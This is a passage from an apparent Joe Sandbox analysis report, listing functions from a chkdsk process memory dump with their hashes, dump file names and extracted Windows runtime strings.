                                                                                                                    • Instruction Fuzzy Hash: 6F61AB71A05749CBDB20DFA8E589FADB7B2BF44704F104469DA05EB694CB74ED80CB82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05850485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • kLsE, xrefs: 058505FE
                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 05850586
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                    • API String ID: 0-2547482624
                                                                                                                    • Opcode ID: 602cdc5dd6cecc08f2247c43fe037fc2fe1558781d6e9bc28d0db7e709011d8b
                                                                                                                    • Instruction ID: ff6a259d04bae22c0b509fb9318c939b808e2cbec26c5f4778d11ff7d2aca07e
                                                                                                                    • Opcode Fuzzy Hash: 602cdc5dd6cecc08f2247c43fe037fc2fe1558781d6e9bc28d0db7e709011d8b
                                                                                                                    • Instruction Fuzzy Hash: 7951BC71A0070ADFDB24DFA9C448BAAB7E9BF44314F04482EDD96D3240E7349D44CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 0585A229
                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 0585A21B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                    • API String ID: 0-2876891731
                                                                                                                    • Opcode ID: 429e2088a6bc2919dbe39b6d4feb01061aef5073f80fe0a527094dc06951b91b
                                                                                                                    • Instruction ID: f31c593ab55857aa9fb02eb59c37f4b67037bed0218927cb93ec5c64d7378a8b
                                                                                                                    • Opcode Fuzzy Hash: 429e2088a6bc2919dbe39b6d4feb01061aef5073f80fe0a527094dc06951b91b
                                                                                                                    • Instruction Fuzzy Hash: 4041EC34604608DBDB19CF59C491FA9BBB9FF45724F5441A5EC06DB3A1E276CD80CB11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058E314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                    • API String ID: 0-118005554
                                                                                                                    • Opcode ID: 0f2c60b8e21d32d9a04b970d3d9d126e40a4009d9d3d34374a18126a64a4f9ad
                                                                                                                    • Instruction ID: 925d490f7caaae3d2014ab65fc851792d4dad68adcc1d01cbd0b113fb277f772
                                                                                                                    • Opcode Fuzzy Hash: 0f2c60b8e21d32d9a04b970d3d9d126e40a4009d9d3d34374a18126a64a4f9ad
                                                                                                                    • Instruction Fuzzy Hash: 9331AB312087419BD315DB68D858B2AB7F8FF86714F180869FDA6CB291EA31ED05CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058831BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .Local\$@
                                                                                                                    • API String ID: 0-380025441
                                                                                                                    • Opcode ID: 102aa13444c140b151bd3708040a682c675373fb8b650f535f2fc62b5c98948d
                                                                                                                    • Instruction ID: 29461d505336f3ea598f62ad4a61b2e9667d93a57ef7b093e140c82f7206023f
                                                                                                                    • Opcode Fuzzy Hash: 102aa13444c140b151bd3708040a682c675373fb8b650f535f2fc62b5c98948d
                                                                                                                    • Instruction Fuzzy Hash: 49317271649305AFD721EF28C984A6BBBE9FB85A54F04092EFD95C3250DB34DD048B93
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058833D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 058C289A
                                                                                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 058C289F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                    • API String ID: 0-2653619699
                                                                                                                    • Opcode ID: 644d2363d8aacbceb7d1b078d08bc3411ae77ced186fec791375efb33a8d9980
                                                                                                                    • Instruction ID: 2f848fefb18d38d028bb26a9f22543ca234eeaf6996c5336cd77e222175c0227
                                                                                                                    • Opcode Fuzzy Hash: 644d2363d8aacbceb7d1b078d08bc3411ae77ced186fec791375efb33a8d9980
                                                                                                                    • Instruction Fuzzy Hash: 14110672B04205ABE726EA48CC42F7E7AE9EB84B14F14846DBD05DB384DA78CD0082A0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                    • Opcode ID: 452126de781e3c9330a2aee65fd3f84b24e9b65f30623a0d3208a3b05a844e2f
                                                                                                                    • Instruction ID: 191ab7c79894e15a743903c38204988b373831003947fb8a21a7f75e59d717f8
                                                                                                                    • Opcode Fuzzy Hash: 452126de781e3c9330a2aee65fd3f84b24e9b65f30623a0d3208a3b05a844e2f
                                                                                                                    • Instruction Fuzzy Hash: 4701ADB2258700AFD325EF54CD06B227BE8E740B29F00893AA958CB690E774ED44CB46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MUI
                                                                                                                    • API String ID: 0-1339004836
                                                                                                                    • Opcode ID: b9d585be43771195ea91e49d3fb25000c552b5254ff562e28ae6e1003d14c7ac
                                                                                                                    • Instruction ID: 0b10147c5af12524c3ddfdad6c6d2d57e3c1722ec6a2da492469154b43e9a841
                                                                                                                    • Opcode Fuzzy Hash: b9d585be43771195ea91e49d3fb25000c552b5254ff562e28ae6e1003d14c7ac
                                                                                                                    • Instruction Fuzzy Hash: DD824975E053189BDB25CFA9C884BADBBB2BF48324F148169DC5AEB250D7309E85CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: GlobalTags
                                                                                                                    • API String ID: 0-1106856819
                                                                                                                    • Opcode ID: f8d76e86bd1db19d9c5c9cbd04bacc594b7d32ab8ffae4ea3f23665ca20c5e64
                                                                                                                    • Instruction ID: 5ea6748035a13d61bfed03cde4a8cac8ce73804db1a4ef9fc6946c59e2d23eb5
                                                                                                                    • Opcode Fuzzy Hash: f8d76e86bd1db19d9c5c9cbd04bacc594b7d32ab8ffae4ea3f23665ca20c5e64
                                                                                                                    • Instruction Fuzzy Hash: 80714BB5E042199BDF18DF9DD580AADBBB2BF48310F2481BEE806E7244E7358D41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0585965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                    • Instruction ID: 72d2ded039873f0ab9a1f0f087a4a3364cb08357b39df304fd8d94c312427afb
                                                                                                                    • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                    • Instruction Fuzzy Hash: D9615575E0121DEBDF21DFA8C844AEEBBB9BB84724F14415AEC12E7250D7749E01CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058DF42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                    • Instruction ID: 05f5aba63c55e6587d5b09bf0b330feb41d0b29fb1901bd9f627893097acdd1a
                                                                                                                    • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                    • Instruction Fuzzy Hash: 15518C72608305AFD7219F18C884F6BB7E8BF84754F040929BA42D7290DB75ED04CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0586E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: EXT-
                                                                                                                    • API String ID: 0-1948896318
                                                                                                                    • Opcode ID: 3560e6bde619495392dd968a08fad457eb43d4150c5c0398008dbcf2baaba3cd
                                                                                                                    • Instruction ID: 57f977a185fe2f427b39618ee33a0236f750ed49c4bcfce26eeff5c157839b05
                                                                                                                    • Opcode Fuzzy Hash: 3560e6bde619495392dd968a08fad457eb43d4150c5c0398008dbcf2baaba3cd
                                                                                                                    • Instruction Fuzzy Hash: 2D41A1766193119BD720DA69C848F6BB7DCAF88714F04092DFD85E7280EA74DD04C793
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058841BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                    • Instruction ID: 04ba26dec12459c5136ffbc7377ccf4eec6bc85f552ca9538dd05f92d7992d2e
                                                                                                                    • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                    • Instruction Fuzzy Hash: 69518972205711ABC320DF58C840A6BBBE8FF48714F00892EF996D76A0E774ED04CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058CC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: BinaryHash
                                                                                                                    • API String ID: 2994545307-2202222882
                                                                                                                    • Opcode ID: 2b043c91670c0932c02abe410240fc80d1a4951777d13bec4d875d633655ccd6
                                                                                                                    • Instruction ID: c00b97c1f05a4ac9608e159298cf9d9f4f90bcfc3e856e2da0e9b6d6eb7d5a1e
                                                                                                                    • Opcode Fuzzy Hash: 2b043c91670c0932c02abe410240fc80d1a4951777d13bec4d875d633655ccd6
                                                                                                                    • Instruction Fuzzy Hash: DE4146B290062DABDF21DA54CC85FEEB77CAB44714F0045E9EE18E7140DB309E898FA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D9429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: verifier.dll
                                                                                                                    • API String ID: 0-3265496382
                                                                                                                    • Opcode ID: b51309c951e81f1729d7cf9d54cf1b4b0033b295b2afa976df460f48d9de123a
                                                                                                                    • Instruction ID: 57b767c58056b417c8dc79649083ed66868b732a6ee1497dc9be4d24ef69d9d5
                                                                                                                    • Opcode Fuzzy Hash: b51309c951e81f1729d7cf9d54cf1b4b0033b295b2afa976df460f48d9de123a
                                                                                                                    • Instruction Fuzzy Hash: 1D31A0757143019FDB248F5C9851A36B7F6FB89758F95807AEE09DB282EA318D808B60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05887425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 0-1885708031
                                                                                                                    • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                    • Instruction ID: ef54a9e737372446d3ba8a6bc5b7c4423403861957959ae394e2bc850dc213b9
                                                                                                                    • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                                                                                    • Instruction Fuzzy Hash: AB417975A0061AABCF25EF88C490BBEBBB5FB80605F20449AED46E7250D735DD81C7A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Flst
                                                                                                                    • API String ID: 0-2374792617
                                                                                                                    • Opcode ID: bdfcdfc96f67d3deec928872ebccebd47d415e6448a83020e791846c7fa92e86
                                                                                                                    • Instruction ID: 87f91748ec01cc91eab3a34a8abed8030fcec459b915e80ff3f19abad6a44679
                                                                                                                    • Opcode Fuzzy Hash: bdfcdfc96f67d3deec928872ebccebd47d415e6448a83020e791846c7fa92e86
                                                                                                                    • Instruction Fuzzy Hash: 644198B16093019FC714DF18C484A26BBE5FB49B14F1489AEE89ACF281DB71DC46CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058CC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: BinaryName
                                                                                                                    • API String ID: 2994545307-215506332
                                                                                                                    • Opcode ID: 50daf6a8834dadc245d5d46fc917e73cca921c0842b6da5f371c5864d70578bc
                                                                                                                    • Instruction ID: 84909661b60cd69864e59f26dbdfd94d129599c51b73394cd9030e207dabb873
                                                                                                                    • Opcode Fuzzy Hash: 50daf6a8834dadc245d5d46fc917e73cca921c0842b6da5f371c5864d70578bc
                                                                                                                    • Instruction Fuzzy Hash: C031D476900619EFDB16DA5CC849E7BBBB5EB80B20F0185ADAD29E7650D730DE00C7D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D85AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 058D85DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                    • API String ID: 0-702105204
                                                                                                                    • Opcode ID: 508974a1f6f226c7c1adf3ddaacd2e8374a1ab0cf2bb779765cd43a37325f559
                                                                                                                    • Instruction ID: 432a6027ad5f9ee32b9c056a25504f14bc0f26f845dd25c242c8651a367b4dca
                                                                                                                    • Opcode Fuzzy Hash: 508974a1f6f226c7c1adf3ddaacd2e8374a1ab0cf2bb779765cd43a37325f559
                                                                                                                    • Instruction Fuzzy Hash: E701F2357083049BDA316AA4A84DF6ABBE6FF41274F050069FD02D7562CB22AC40CEB5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058A717A Relevance: .7, Instructions: 705COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0da774ec6b20e40b8d991d772b9599d36edcd2ed003f608398bdbf6cfadc44a2
                                                                                                                    • Instruction ID: bc54e07dd10bf10caa035c1e3ab4e5e1db5722670bb54386a5ba7b27c5e9d6ef
                                                                                                                    • Opcode Fuzzy Hash: 0da774ec6b20e40b8d991d772b9599d36edcd2ed003f608398bdbf6cfadc44a2
                                                                                                                    • Instruction Fuzzy Hash: B0427172A0461A8FEB19CF59C490ABEB7B6FF88314B14856DD952EB340D734EC42DB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587B1E0 Relevance: .6, Instructions: 629COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f388bae0a497bada3bfd3758fcb0ce2b36d98442bd1275623ad688ca8e23bff1
                                                                                                                    • Instruction ID: 2eba62e2ddb52bd87215815f922d8ffed5d4e81e00b18c34329b844d5c7d9c0d
                                                                                                                    • Opcode Fuzzy Hash: f388bae0a497bada3bfd3758fcb0ce2b36d98442bd1275623ad688ca8e23bff1
                                                                                                                    • Instruction Fuzzy Hash: CC327B76E042199BCF14DFA8C885AAEBBB6FF44705F180129EC06EB390E7759D41CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05862760 Relevance: .6, Instructions: 605COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
